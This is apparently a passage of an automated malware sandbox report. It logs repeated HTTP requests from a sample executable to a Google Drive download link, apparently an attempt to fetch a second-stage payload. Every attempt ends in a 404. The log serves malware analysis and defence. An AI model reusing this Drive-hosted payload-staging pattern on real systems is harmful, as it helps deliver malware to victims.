                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:03:35 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:03:35 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce-tW2Su85Eu-sDSXiNGc_Pqg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.11.2049758142.250.64.1934435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:03:35 UTC460OUTGET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:03:35 UTC1854INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:03:35 GMT
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-qsoCTM7zQRXihrro6J53yg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC6aCsKJrMqKR-SWJ3Ne4FfW9hoxL195L1n3RcGCE9NcXw2I-vwrlnVBKjt96Xm_Tg9cT9WlmQgINg
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:03:35 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 4c 72 33 6d 34 64 70 43 6b 75 53 47 53 78 70 5a 36 74 79 4c 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="aLr3m4dpCkuSGSxpZ6tyLQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.11.2049759142.250.217.2384435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:03:46 UTC418OUTGET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:03:46 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:03:46 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: script-src 'nonce-_mnH2hEEyFM_65q-zUjZfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.11.2049760142.250.64.1934435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:03:46 UTC460OUTGET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:03:46 UTC1854INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:03:46 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-7TnWtPbsWZ7wmD8vRnGV0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC5optG5Un4AE1YB_ns3GjnZPPjMsYeraNIJue9hWMqGActRp3nNp3l8WXwX9QovpBY7WEYDDnRwsw
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:03:46 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 2d 57 55 66 4b 4f 38 56 49 6a 2d 59 4d 4d 6b 52 31 43 7a 7a 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="A-WUfKO8VIj-YMMkR1CzzA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.11.2049761142.250.217.2384435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:03:57 UTC418OUTGET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:03:57 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:03:57 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-QUSSF-e5l-Fnc_2_1oF4OQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.11.2049762142.250.64.1934435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:03:57 UTC460OUTGET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:03:58 UTC1854INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:03:58 GMT
                                                        Content-Security-Policy: script-src 'nonce-icaGCId8_gFuSdVpjuZkXg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC406yfPXNi0hDG2XfAmUFRhutX9VZPbMO3v_cKFkQUtD3MR5NZuswmQBbI95Yt3njF0DN8rBMljTg
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:03:58 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 31 51 6e 49 41 57 79 65 64 32 39 75 6e 6f 4c 5a 49 36 49 36 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="N1QnIAWyed29unoLZI6I6Q">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.11.2049763142.250.217.2384435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:04:08 UTC418OUTGET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:04:08 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:04:08 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce-gKf9A7JvjBh-oTnC2Z5lJA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.11.2049764142.250.64.1934435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:04:09 UTC460OUTGET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:04:09 UTC1854INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:04:09 GMT
                                                        Content-Security-Policy: script-src 'nonce-Bc_2vepgCjqMuBTIqRBnpw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC4eVvjuM7JnlEacZhEo5fECOFN3i6ig_GkQRtxdJhXATneCuct0yPQ3qOY9tIV5Q2ehUt9ELSoS9w
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
